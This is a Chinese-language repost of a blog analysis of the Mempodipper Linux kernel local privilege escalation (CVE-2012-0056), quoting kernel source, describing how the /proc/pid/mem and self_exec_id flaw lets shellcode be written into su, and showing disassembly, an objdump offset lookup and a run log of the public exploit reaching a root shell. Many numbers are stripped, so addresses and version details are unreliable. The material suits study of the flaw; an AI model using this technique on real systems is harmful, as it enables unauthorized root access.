位置: 编程技术 - 正文

Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)

编辑:rootadmin

推荐整理分享Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)

Linux>=2.6. Mempodipper本地提权分析和EXP利用(CVE--) /proc/pid/mem是一个用于读取和写入,直接通过各地寻求与相同的地址作为该进程的虚拟内存空间进程内存的接口。 影响Linux 内核> = 2.6. 当打开/proc/pid/mem时,会调用此内核代码:复制代码代码如下: static int mem_open(struct inode* inode, struct file* file) { file->private_data = (void*)((long)current->self_exec_id); file->f_mode |= FMODE_UNSIGNED_OFFSET; return 0; } 任何人都可以打开/proc/pid/mem fd 的任何进程写入 和读取,不过,有权限检查限制。让我们看看写功能: 复制代码代码如下: static ssize_t mem_write(struct file * file, const char __user *buf, size_t count, loff_t *ppos) { struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode); mm = check_mem_permission(task); copied = PTR_ERR(mm); if (IS_ERR(mm)) goto out_free; if (file->private_data != (void *)((long)current->self_exec_id)) goto out_mm; 看代码有两个检查,以防止未经授权的写操作: 复制代码代码如下: check_mem_permission和self_exec_id。 Check_mem_permission的代码只需调用到__check_mem_permission,代码: static struct mm_struct *__check_mem_permission(struct task_struct *task) { struct mm_struct *mm; mm = get_task_mm(task); if (!mm) return ERR_PTR(-EINVAL); if (task == current) return mm; if (task_is_stopped_or_traced(task)) { int match; rcu_read_lock(); match = (ptrace_parent(task) == current); rcu_read_unlock(); if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH)) return mm; } mmput(mm); return ERR_PTR(-EPERM); } 有两种方法能对内存写入。 复制代码代码如下: $ su "hsmw fuck you" Unknown id: hsmw fuck you 可以看到su的stderr 的输出“Unknown id:”,我们可以fd 打开/proc/self/mem, 来确定在内存中的位置, 然后dup2 stderr 和mem fd, 把su $shellcode 写入到内存中,获得root. 已task == current测试, 用self_exec_id 匹配self_exec_id 来检测fd 的打开。 Self_exec_id在内核中只引用的少数几个地方。 void setup_new_exec(struct linux_binprm * bprm) { current->self_exec_id++; flush_signal_handlers(current, 0); flush_old_files(current->files); } EXPORT_SYMBOL(setup_new_exec); 我们创建一个子进程,用self_exec_id来exec 到一个新的进程里面。当我们exec一个新的进程,self_exec_id会产生一个增量。这里程序忙与execing到我们的shellcode写su,所以其self_exec_id得到 相同的值递增。所以我们要做的是把exec一个新的进程,fd /proc/parent-pid/mem 到父进程的PID。这个时候的FD是因为没有权限仅仅打开检查。当它被打开,其self_exec_id来时起作用,把我们exec来su,用self_exec_id将递增。通过我们打开的FD从子进程返回父进程,dup2,和exec 溢出代码到su. 接下来调试溢出的地址和ASLR随机进程的空间地址。 在这里得到错误字符串: : ba mov $0x5,%edx c: be ff mov $0xff,%esi : ff xor %edi,%edi : e8 e0 ed ff ff callq (dcgettext@plt) 然后把它写入到stderr: : 8b 3d mov 0x(%rip),%rdi # e8 (stderr) f: c2 mov %rax,%rdx : b9 mov $0x,%ecx : be mov $0x1,%esi c: c0 xor %eax,%eax e: e8 ea ff ff callq (__fprintf_chk@plt) 关闭日志; a3: e8 f0 eb ff ff callq (closelog@plt) 退出程序; a8: bf mov $0x1,%edi ad: e8 c6 ea ff ff callq (exit@plt) 这里可以看到0×,这是它调用exit函数。我们来调试“Unknown id:" 的shellcode地址。 $objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*([^0]*)/0x1/' 0x 它会设置uid 和gid 为0 去执行一个SHELL。还可以重新打开dup2ing 内存之前,stderr fd 到stderr, 我们选择另一个fd dup stderr,在shellcode,到我们dup2 ,其他fd回来到stderr。 EXP 老外写好了。插入一段 复制代码代码如下: wget CVE-- $ ls build-and-run-exploit.sh build-and-run-shellcode.sh mempodipper.c shellcode-.s shellcode-.s CVE-- $ gcc mempodipper.c -o mempodipper CVE-- $ ./mempodipper =============================== = Mempodipper = = by zx2c4 = = Jan , = =============================== [+] Waiting for transferred fd in parent. [+] Executing child from child fork. [+] Opening parent mem /proc//mem in child. [+] Sending fd 3 to parent. [+] Received fd at 5. [+] Assigning fd 5 to stderr. [+] Reading su for exit@plt. [+] Resolved exit@plt to 0x. [+] Seeking to offset 0xc. [+] Executing su with shellcode. sh-4.2# whoami root sh-4.2# 摘自 混世魔王博客

linux下磁盘查看命令分享 一.fdisk命令fdisk是磁盘分区命令,详细命令的使用可查看相关文档使用命令fdisk-l查看当前磁盘的分区状态二.df命令df是来自于coreutils软件包,系统安

linux下磁盘分区详解 图文 Centos下磁盘管理1.磁盘分区格式说明linux分区不同于windows,linux下硬盘设备名为(IDE硬盘为hdx(x为从ad)因为IDE硬盘最多四个,SCSI,SATA,USB硬盘为sdx(x

linux vi编辑常用命令 vi编辑器中有三种状态模式1.命令模式2.输入模式3.末行模式三种模式间的相互转换vi编辑器的启动与退出直接进入编辑环境$vi进入编辑环境并打开(新建

标签: Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)

本文链接地址:https://www.jiuchutong.com/biancheng/364147.html 转载请保留说明!

上一篇:nginx做负载CDN加速获取端真实ip(nginx实现负载均衡的流程)

下一篇:linux下磁盘查看命令分享(linux如何查看磁盘信息)

  • 关税完税价格计算消费税公式
  • 多交增值税怎么算
  • 文化事业费是什么意思
  • 支付转让费待摊怎么做账
  • 工会费个税税前扣除标准
  • 金税盘没有及时清卡怎么办
  • 银行承兑汇票到期日期怎么算
  • 购买固定资产时的运费
  • 零售盘点窍门
  • 机器设备如何计提折旧
  • 消费税的计税方法
  • 公司购入货架如何做账
  • 不是公司股东的投资者可以提前拿走投资款吗
  • 企业所得税减免优惠政策
  • 污泥处置中心所得税优惠政策
  • 小微企业利润亏损原因
  • 关于个体工商户的法律规定及司法解释
  • 税收征管法关于全款未收房的规定
  • 季报表利润表本月怎么算
  • 现金结算的股权支付等待期
  • 企业所得税的计算公式及实例
  • 登陆对话框不能输入
  • Secure Boot什么意思?BIOS中Secure Boot灰色无法更改解决方法详解
  • 在win7系统中,添加打印机驱动程序
  • 如何修复win7系统引导
  • 鸿蒙系统怎么开启OTG
  • 合同已无法履行
  • 补缴社保会被税务稽查吗
  • php常用设计模式(大总结)
  • 不开票收入如何纳税申报
  • 应收账款融资的风险控制
  • 固定资产置换存货的账务处理
  • 辅料分配方法
  • 最小的洗衣机是多少
  • 代开发票所需的资料?
  • Jetson Xavier NX配置全过程——安装jtop和OpenCV4.5.3(二)
  • 记账软件的作用
  • 应付账款重分类含不含暂估
  • 填报的资产总额在季初和季末存在差异是什么意思
  • 哈士奇宠物狗
  • 支付第三方劳务费计入什么科目
  • 管理费用中的福利费有限额吗
  • 实发工资知道如何发放吗
  • 退回以前年度的增值税账务处理
  • 生活服务业纳税义务发生时间
  • 发票明细清单怎么打印
  • canvas实现图片编辑
  • js读取json配置文件
  • 免增值税项目可以抵扣吗
  • 一般纳税人销售旧货适用征收率是?
  • 应收账款扣款会计处理
  • mongodb replica set 添加删除节点的2种方法
  • 汽车保险合同由什么组成
  • 会务费什么企业可以开
  • 开工程款发票有什么规定?
  • 先弥补亏损还是先分配利润
  • 异常凭证一定要转出吗
  • 什么是企业汇算清缴年度
  • 跨年预收账款被税局要求确认收入怎么交增值税
  • 固定资产卡片账是什么
  • 软件开发并销售产品
  • 物业费会计科目怎么做
  • 事业单位如何计算退休工资
  • 只知道主营业务怎么办
  • 企业资产负债表怎么做
  • 应收账款转回坏账怎么办
  • 电汇凭证是什么会计科目
  • 管理费用业务招待费包括哪些
  • win7系统弹出cd
  • windows8怎么设置
  • window10邮件
  • win10一年更新一次
  • javascript 操作css
  • unity3d颜色
  • opengl入门教程(精)
  • 根据安全生产法的规定,生产经营单位
  • angular中的$scope
  • angular ...
  • jquery事件解绑
  • 广东电子税务局手机版
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设